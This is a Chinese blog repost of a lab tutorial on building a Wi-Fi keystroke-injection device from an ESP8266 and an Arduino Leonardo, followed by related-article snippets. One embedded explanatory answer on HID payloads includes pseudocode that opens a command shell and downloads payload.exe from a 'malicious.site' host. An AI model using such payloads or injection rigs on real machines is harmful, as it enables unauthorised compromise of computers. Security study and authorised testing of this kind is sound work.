HID攻击进阶——WHID injector

Wi-Fi HID 注入攻击实验
最新推荐文章于 2024-05-13 09:45:38 发布
转载 最新推荐文章于 2024-05-13 09:45:38 发布 · 620 阅读 · 3 ·
CC 4.0 BY-SA版权
原文链接:https://my.oschina.net/u/3612774/blog/1622233

本文介绍了一种通过Wi-Fi实现的人机接口设备(HID)注入攻击实验。实验使用ESP8266作为接入点(AP),Arduino Leonardo作为攻击主机,通过无线方式控制目标计算机的键盘输入。

前言

HID是Human Interface Device的缩写,意思是人机接口设备。它是对鼠标、键盘、游戏手柄这一类可以操控电脑设备的统称。延伸出的WHID代表基于Wi-Fi的HID注射器,即对HID攻击进行无线化攻击时的一种注入工具。

本次实验采用的攻击原理如下图:

攻击者使用ESP8266作为AP,在自己的电脑创建客户端连接AP。在客户端键入命令发送到ESP8266,它再转发给Arduino Leonardo。利用Arduino中的Keyboard库就可以使用传输的命令控制目标主机的键盘。

一、 前期准备

1) 硬件设备:

    1.Arduino Leonardo

    2.ESP8266 Wi-Fi模块

    3.稳压器

2) 软件环境:

1. sockettool(在工具集中):

    用于连接ESP8266:在电脑上运行软件创建客户端,与ESP8266创建的AP之间进行通讯。

2. Arduino IDE:

    编写程序烧录进Arduino Leonardo。实验用版本为1.8.3.

3. 串口调试助手(在工具集中):

    调试程序所需。

二、 实验步骤

1) ESP8266设置

使用串口连接ESP8266,依次键入命令:

  1. AT+CWMODE=3 //设置模式为AP兼Station模式
  2. AT+RST //模式改变需重启后生效
  3. AT+CWSAP=”name”,”password”,11,2 //创建一个名为name,密码为password的AP节点
  4. AT+UART=9600,8,1,0,0 //设置波特率为9600,Arduino和ESP8266波特率需相同

2) 代码烧录

在接线之前需要将代码烧录进Arduino Leonardo,直接将代码复制进工程,连接Arduino在IDE界面点击“上传”。详细代码见附录,这里分析关键部分。

初始化ESP8266:

上述代码在setup中执行,在每次Arduino连接电源后对ESP8266进行设置。

代码中“AT+RST”为重启,“AT+CIPMUX=1”设置为多路连接,“AT+CIPSERVER=1,8089”创建服务器并设置端口。

读取显示数据:

在loop中循环读取ESP8266向串口发送的数据并打印在Arduino接入的电脑上。需要注意的是Serial1.readStringUntil(‘:’)这句话,因为使用ESP8266传输的数据格式为:“+IPD,0,3:123”,其中123为你输入的字符,所以使用这句话可以过滤“:”及其之前的字符。

很重要的一点是:如果不使用Until,当第一个字节为符号时Arduino不能输出,这时第一个字节是加号,所以在电脑上看不到任何输出。

3) 硬件接线

设置好ESP8266和Arduino之后就可以进行硬件接线了,接线原理图如下:

其中Arduino和ESP8266务必共地,否则容易出现乱码的现象,这可以使用稳压器实现。实际接线图如下:

4) 客户端操作

    1. 连接到之前创建的网络name。

    2. 打开sockettool.exe,点击左侧“TCP Client”后点击“创建”来创建客户端:

    3. 输入IP:“192.168.4.1”,端口号:“8089”:

    4. 点击“连接”,如果连接成功可以看到“已连接”字样:

三、 实验演示

确保在已连接状态下,发送两次“123”:

可以在目标主机看到键入的结果:

如果想要了解更多网络空间安全知识,请访问 https://www.sectown.cn/?from=oschina,或者搜索 SecTown 。

转载于:https://my.oschina.net/u/3612774/blog/1622233

chidao8420
关注
WHID-Mobile-Connector:Android Mobile App,用于远程控制WHID喷油器
05-02
WHID移动连接器 WHID Mobile Connector设计为易于使用的移动应用程序,可让您轻松控制WHID小工具。 如果需要有关HID攻击和/或“ USB密钥”背后的概念的更多信息,请参考 。 Play商店上WHID移动连接器的官方链接位于 。 技术概述 WHID移动连接器是一个离子移动应用程序(又名混合应用程序)-(〜可以在任何设备上使用)到目前为止,仅发布Android版本。 可以在以下位置获取新的构建: : UI是基于Angular的,“本机”功能是使用Cordova框架完成的,对最终用户而言是无缝的。 我要营造环境 1.设置您的环境 当然。 几个步骤可以使魔术发生: 首先,安装node和npm(取决于您的操作系统) 对于Mac用户, brew将使其成为: brew install node 然后,安装npm : brew install npm 最后,安
WHID Injector:将HID攻击带入新境界
weixin_33919950的博客
05-13 278
HID Attack是最近几年流行的一类攻击方式。HID是Human Interface Device的缩写,意思是人机接口设备。它是对鼠标、键盘、游戏手柄这一类可以操控电脑设备的统称。 由于电脑对这类设备缺少严格的检测措施,只是简单的识别设备类型,就允许设备对电脑进行各项操作。所以,通过修改篡改设备反馈信息,就可以很轻松的让电脑将其他设备误认为HID设...
基于Wi-Fi的HID注射器,利用WHID攻击实验
weixin_33896069的博客
08-08 228
WHID 代表基于 Wi-Fi 的 HID 注射器,即对 HID 攻击进行无线化攻击的一种注入工具。  实验攻击原理如下图:   攻击者使用ESP8266作为AP,在自己的电脑创建客户端连接AP。在客户端键入命令发送到ESP8266,它再利用串口转发给Arduino Leonardo。利用Arduino中的Keyboard库就可以使用传输的命令控制目标主机的键盘。  前期准备 1. 硬件设备 Ar...
HID***进阶——WHID injector
weixin_34378969的博客
03-02 235
前言   HID是Human Interface Device的缩写,意思是人机接口设备。它是对鼠标、键盘、游戏手柄这一类可以操控电脑设备的统称。延伸出的WHID代表基于Wi-Fi的HID注射器,即对HID***进行无线化***时的一种注入工具。本次实验采用的***原理如下图:  ***者使用ESP8266作为AP,在自己的电脑创建客户端连接AP。在客户端键入命令发送到ESP8266,它再转发给...
探索未来安全:WHID Injector —— 无线HID注入神器
gitblog_00082的博客
05-13 599
探索未来安全:WHID Injector —— 无线HID注入神器 WHIDWiFi HID Injector - An USB Rubberducky / BadUSB On Steroids.项目地址:https://gitcode.com/gh_mirrors/wh/WHID 在信息安全领域,创新和进攻性工具始终是关键。WHID Injector就是这样一款革命性的开源硬件设备,它将传统...
信息安全_数据安全_How_To_Bring_HID_Attacks_To_The_.pdf
08-22
到了第三代,WHID Injector和P4wnP1等工具引入了WiFi功能,增强了远程控制和灵活性,降低了攻击成本。 为了防御HID攻击,我们需要采取多方面的策略。首先,企业应实施严格的安全管控政策,对所有接入网络的USB设备...
(源码)基于Arduino的WiFi控制HID键盘模拟器.zip
03-31
ESPloitV2是一款类似Hak5的USB橡胶鸭的WiFi控制HID键盘模拟器,专为Cactus WHID(采用ESP 12S WiFi模块与32u4微控制器的USB棒)设计。该设备具备4M闪存,能存储固件与多个有效载荷。与USB橡胶鸭不同的是,它借助WiFi...
(源码)基于Arduino框架的WiFi控制HID键盘模拟器.zip
最新发布
04-08
ESPloitV2是一款类似Hak5的USB橡胶鸭的WiFi控制HID键盘模拟器,专为Cactus WHID设备打造。该设备借助ESP 12S WiFi模块与32u4微控制器串行连接,拥有4M闪存,可存储固件和多个有效载荷。与USB橡胶鸭不同,它具备WiFi...
whid.nvim:NeoVim插件,用于显示最近使用过的文件
04-12
威尼维姆 :clapper_board: NeoVim插件,用于在git repo中显示最近提交的文件。 :television: 演示版 :evergreen_tree: 目录 去做 :wrapped_gift: 特征 显示最近提交的文件 ...<q> :退出Whid.nv
USB HID攻击与防护技术综述
03-12
最新badusb的论文,大家可以一起学习,一起探讨
HID 最简单的源码
03-12
vc++6.0 上的最精简的 USB HID 源码, STM32测试正常。
kali之HID Attack
小刚的博客
05-17 2182
今天尝试了一下kali nethunter系统的一个特色功能HID Attack,可以说是无敌的存在啊!! HID Attack 是一种人机接口设备攻击,就类似与模拟键盘,鼠标,手柄而实现对电脑的操作, 而电脑对于这种攻击的预防可以说是啥也不管,只是识别一下设备,就把它当成了键盘或者鼠标等HID设备,所以插上就能用。 HID Attack我的理解是预先编程好脚本,他会模拟键盘命令输入电脑,实现对...
人机接口设备攻击HID Attack)
11-21 411
人机接口设备攻击HID Attack) HID Attack是最近几年流行的一类攻击方式。HID是Human Interface Device的缩写,意思是人机接口设备。它是对鼠标、键盘、游戏手...
WHID注入器:在无线环境下实现HID攻击的最新利器
weixin_33963594的博客
09-19 694
本文讲的是WHID注入器:在无线环境下实现HID攻击的最新利器, 自从我开始研究Teensy系列开发板的设备以来,就一直面临着如何在恰当的时候提供某种有效载荷。HID全称为Human Interface Device,即与用户进行交互的设备,例如键盘、鼠标与游戏杆等,不过HID设备并不一定要有人机接口,只要符合HID规则的设备都是HID设备。刚开始,我...
Teensy-HID攻击(近源渗透)
墨痕诉清风的博客
03-24 559
准备工作 一块Teensy2.0++的板子(淘宝一搜就有) Arduino编译器 1.8.7版本下载连接:arduino下载地址(https://downloads.arduino.cc/arduino-1.8.7-linux64.tar.xz) Teensy插件 下载连接:Teensy下载地址()https://www.pjrc.com/teensy/td_144/TeensyduinoInstall.linux64Teensy下载地址() 1.下载好arduino后直接解压 ...
HID高级攻击姿势:利用PowerShell脚本进行文件窃取
qq_28247467的博客
03-30 917
0×01 引言 又到了期中考试了,我又要去偷答案了,一直发现远程下载运行exe的方式不太好,容易报毒所以这里打算用ps脚本。 0×02 关于HID HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HID设备。一般来讲针对HID攻击主要集中
USB HID 攻击、深度学习方法检测
weixin_44346287的博客
12-31 417
USB HID 攻击、深度学习方法检测 USB HID 攻击 通过篡改USB设备的描述符,枚举一个USB键盘,获取目标计算机权限,注入精心设计的攻击向量,篡改目标机设置,更爱路由,扫描敏感文件等。 未完待续。。。。 ...
改进版 | 浅析几种HID硬件攻击
蚁景网安学院
05-31 1173
本文原创作者:MR.zhang原创投稿详情:重金悬赏 | 合天原创投稿等你本篇文章在上篇文章上做了改进,写得更详细生动,可收藏学习!0x01 WhatIs HIDHID全称为Human...
HID Payload
04-02
<think>好的,我现在需要帮助用户理解HID Payload在IT安全或道德黑客中的含义及用法。首先,我得先回忆一下HID的基础知识。HID是Human Interface Device的缩写,通常指键盘、鼠标等输入设备。在安全领域,HID攻击通常指的是利用这些设备接口执行恶意操作,比如BadUSB攻击。Payload在这里应该是指攻击中携带的有效载荷,也就是实际执行的恶意代码或指令。 接下来,我需要确认HID Payload的具体应用场景。比如,攻击者可能会将恶意固件刷写到USB设备中,使其伪装成键盘,当插入目标计算机时自动执行按键操作,比如打开命令行、下载恶意软件等。这种情况下,HID Payload就是模拟键盘输入的一系列指令,比如使用Ducky Script编写的脚本。 然后,我应该考虑HID Payload的常见工具和实例。例如,USB Rubber Ducky和MalDuino是常用的硬件工具,它们可以快速注入预定义的攻击脚本。这些工具使用的Payload通常需要转换成目标系统能够识别的键盘输入,可能涉及不同操作系统的兼容性问题,比如Windows、MacOS或Linux下的不同快捷键。 另外,HID攻击的防御措施也很重要。用户可能需要知道如何防范这类攻击,比如禁用自动运行、使用设备白名单或物理隔离USB端口。同时,引用中的安全等级一提到可审计的代码,这可能与确保设备固件的来源可信有关,防止恶意固件被刷入。 用户的问题还提到道德黑客中的使用,所以需要强调合法授权的重要性。在渗透测试中,HID Payload可能用于模拟攻击,测试系统的物理安全防护。例如,测试公司内部员工是否会随意插入未知USB设备。 最后,我需要组织这些信息,用清晰的结构解释HID Payload的定义、工作原理、典型工具、攻击场景和防御措施,并生成相关问题。同时,确保遵循格式要求,如使用中文、正确LaTeX格式(虽然这个问题可能用不上太多数学公式,但如果有变量或代码示例,需正确应用),并添加引用标识。</think>### HID Payload 的含义及用法 #### 1. **HID 的定义** **HID**(Human Interface Device,人机接口设备)指与用户直接交互的设备,如键盘、鼠标、触摸屏等。在安全领域,**HID Payload** 特指通过模拟此类设备的输入行为执行恶意操作的代码或指令[^1]。 #### 2. **HID Payload 的工作原理** 攻击者通过篡改或伪造HID设备(如USB设备),使其在接入目标系统时被识别为合法输入设备。随后,HID Payload 会模拟键盘输入或鼠标操作,自动执行预定义的恶意命令。例如: ```python # 模拟键盘输入打开命令行并下载恶意文件(伪代码示例) PRESS WIN + R TYPE "cmd.exe /k curl http://malicious.site/payload.exe -O C:\payload.exe" PRESS ENTER ``` #### 3. **典型攻击场景** - **BadUSB攻击**:恶意USB设备被插入后,伪装成键盘并注入Payload[^1]。 - **自动提权**:通过快捷键组合启动系统漏洞利用程序。 - **数据窃取**:记录键盘输入(如密码)并回传至攻击者服务器。 #### 4. **常用工具与实例** - **USB Rubber Ducky**:支持Ducky Script编写Payload,语法示例: ``` DELAY 1000 STRING Hello, HACKED! ENTER ``` - **MalDuino**:基于Arduino的开源工具,可自定义攻击逻辑。 - **Cactus WHID**:结合WiFi远程控制的HID攻击设备。 #### 5. **防御措施** - **禁用自动执行**:关闭系统的自动运行功能(如Windows的AutoPlay)。 - **设备白名单**:仅允许授权设备接入(引用安全等级一的代码审计原则[^1])。 - **物理隔离**:限制USB端口使用,或采用防篡改硬件。 #### 6. **道德黑客中的应用** 在授权渗透测试中,HID Payload 可用于: - 测试物理安全策略(如员工是否会插入未知USB)。 - 验证系统对自动化攻击的防护能力(如快捷键漏洞)。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值